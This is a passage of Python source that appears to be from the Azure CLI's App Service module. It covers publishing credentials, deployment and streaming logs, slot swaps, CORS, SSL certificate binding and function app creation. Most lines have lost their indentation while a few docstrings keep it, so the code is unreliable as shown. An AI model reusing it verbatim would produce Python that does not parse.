result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
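    ''' Return the Kudu (SCM) site URL for the app, derived from its repository host name '''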
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
    Update deployment credentials. (Note: all webapps in your subscription will be impacted.)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
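    ''' Return the browsable URL of the app, preferring https when any host name has SSL enabled '''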
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
        level = application_logging != 'off'
        if application_logging in ['filesystem', 'off']:
            fs_log = FileSystemApplicationLogsConfig(level=level)
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be implemented later.
        # Tracked as Issue: #4764 on GitHub
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
            # 100 MB max log size, retention lasts 3 days. Yes we hard-code it; the portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
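    '''
    Swap deployment slots: 'swap' performs the swap, 'preview' applies the source slot's
    settings to the target without completing the swap, and any other action resets the
    pending swap configuration.
    '''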
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
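    '''
    Fetch logs over HTTP with basic auth: write them to log_file when given, otherwise
    stream them to stdout until interrupted.
    '''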
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
                # Extra encode() and decode() for stdout encodings that do not support 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
    ''' Load the .pfx file and return the certificate's SHA-1 thumbprint '''
    with open(certificate_file, 'rb') as cert_file:
        p12 = OpenSSL.crypto.load_pkcs12(cert_file.read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
        raise CLIError('Managed Certificates are not supported on the Free and Shared tiers.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
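    '''
    Update a single host name's SSL binding (state and thumbprint) by sending a minimal
    Site payload containing just that host_name_ssl_states entry.
    '''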
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
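    '''
    Find the certificate with the given thumbprint in the plan's resource group and bind
    (or unbind) it to every matching host name of the app, handling wildcard certificates.
    '''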
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
runtime = re.split('[| :]', runtime) # delimiters allowed: '|', ' ', ':'
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks_hardcoded(self):
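        '''
        Populate self._stacks from the bundled RUNTIME_STACKS JSON file (linux or windows
        section) and attach the appropriate site-config/app-settings setter to each entry.
        '''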
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
            # get all stack versions except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None):
# pylint: disable=too-many-statements, too-many-branches
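    '''
    Create a function app on either a consumption plan (consumption_plan_location) or an
    existing App Service plan (plan), resolve the runtime stack and its app settings,
    optionally configure a container image, Application Insights and source control, and
    assign managed identities when requested.
    '''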
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
KEYS = FUNCTIONS_STACKS_API_KEYS()
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
